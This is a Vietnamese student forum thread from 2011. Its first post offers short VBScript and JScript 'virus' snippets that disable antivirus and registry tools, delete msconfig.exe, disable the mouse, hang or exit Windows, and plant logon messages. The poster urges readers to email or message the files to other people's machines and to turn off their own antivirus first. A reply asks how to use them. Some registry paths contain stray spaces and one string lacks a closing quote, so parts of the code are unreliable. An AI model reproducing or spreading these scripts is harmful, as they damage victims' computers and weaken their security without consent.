TIN HỌC ỨNG DỤNG 2 - K11
Bạn hãy đăng ký làm thành viên để có thể xem các thông tin trong lớp và viết bài trong diễn đàn.

Không những thế, sau khi đăng ký bạn sẽ nhận được sự hỗ trợ của diễn đàn nhiều hơn.
Change background image
TIN HỌC ỨNG DỤNG 2 - K11

Khoa CNTT - ĐH Công nghiệp Hà Nội


Go downMessage [Page 1 of 1]

© FMvi.vn

on 16/6/2011, 21:09
avatar
avatar

Member

Chỉ với Notepad hay Wordpad bạnđã có thể tự tạo cho mình 1 "chú" Virus dưới dạng _VBSCRIPT hoặc _Javascript rồi:
Dưới đây là code của một số con virus nhỏ dưới dạng VBS:
1.Không cho victim khởi động máy:
Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"

2. Disable NAV:
Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\S ervi c es\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"

3. Hiển thị một message mỗi khi reboot máy:
dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = "HKLM\Software\Microsoft\Windows\CurrentVersio n\Wi n Logon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "http://allformy.topcities.com"
wsh.RegWrite s1+s3, "Ta la anh_hung_bat_dac_di000-Toi den tu HVA"

4. Hiển thị một dòng lệnh khi click vào file hay folder:,
set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Ban da bi toi khong che"
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Ban da bi toi khong che","I_LOVE_U"

5. Làm cho các trò trên hoạt động bình thường:
Dim objShell
Set objShell = CreateObject( "WScript.Shell" )
s1 = "HKEY_USERS\.Default\Software\Microsoft\Window s\Cu r rentVersion\ "
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"
Dưới dạng Javascipt :
var wsh;
wsh=new ActiveXObject ("Wscript.shell");

// Winlogon when reboot

var s1 = "HKLM\\Software\\Microsoft\\Windows\\CurrentVe rsio n WinLogon";
var s2 = "LegalNoticeCaption";
var s3 = "LegalNoticeText";
wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ;
wsh.RegWrite (s1+s3, "Ban da bi toi khong che") ;
//Disable Registry
var s1 = "HKEY_USERS\\.Default\\Software\\Microsoft\\Wi ndow s CurrentVers ion\\";
var s2 = "Policies\\System\\DisableRegistryTools" ;
wsh.RegWrite (s1+s2,0,"REG_DWORD");

//Delete file Msconfig.exe làm cho victim khởi động tới Registry luôn
var fso;
fso=new ActiveXObject("Scripting.FileSystemObject");
var fe=fso.getfile("C:\\windows\\msconfig.exe);
fe.delete true;

//Shutdown windows
//Disable Mouse
wsh.run ("RUNDLL32.EXE mouse,disable");

//Hang up windows
wsh.run ("rundll32 user,disableoemlayer");
Bạn chỉ cần copy cái code này rồi save nó thành file, sau đó đem file này gửi đi các máy khác, gửi qua mail nè, qua Mesenger nè, hay là bạn copy cái này rồi đem ra dịch vụ thử nghiệm xem sao.Bạn copy xong rùi, thay vì save nó dưới dạng *.Txt (trong Wordpad hay Notepad dzì dzì đó) , bạn đổi thành *.VNSCRIPT hay *.JAVASCRIPT là xong liền hà. Chúc bạn thành công (đừng thử nghiệm mình nha !)Nếu làm không cẩn thận thì mình sẽ là nạn nhân đầu tiên đấy
Chú ý: khi tạo file virut bạn phải tắt hết các phần mềm diệt virut nha bạn, không là nó " khử"nay việc bạn vừa mới làm đó! . Không được dùng vào mục đích xấu!
View user profile

Thích

Báo xấu [0]

Gửi một bình luận lên tường nhà lam son 719
Trả lời nhanh
on 17/6/2011, 19:07
avatar
avatar

Member

nguy hiểm chạy lẹ khi tạo xong thỳ dùng thế nào

Ký tên:
||||||||||||||||||||
| Anh Quân ---- ||| '|"; \,___.
|_..._...______===|=||_|__|...,]
"(@)'(@)""""(@ )(@) === (@)
View user profile

Thích

Báo xấu [0]

Gửi một bình luận lên tường nhà Anh Quân
Trả lời nhanh

Back to topMessage [Page 1 of 1]

  © FMvi.vn

« Xem bài trước | Xem bài kế tiếp »

Bài viết liên quan

    Quyền hạn của bạn:

    You cannot reply to topics in this forum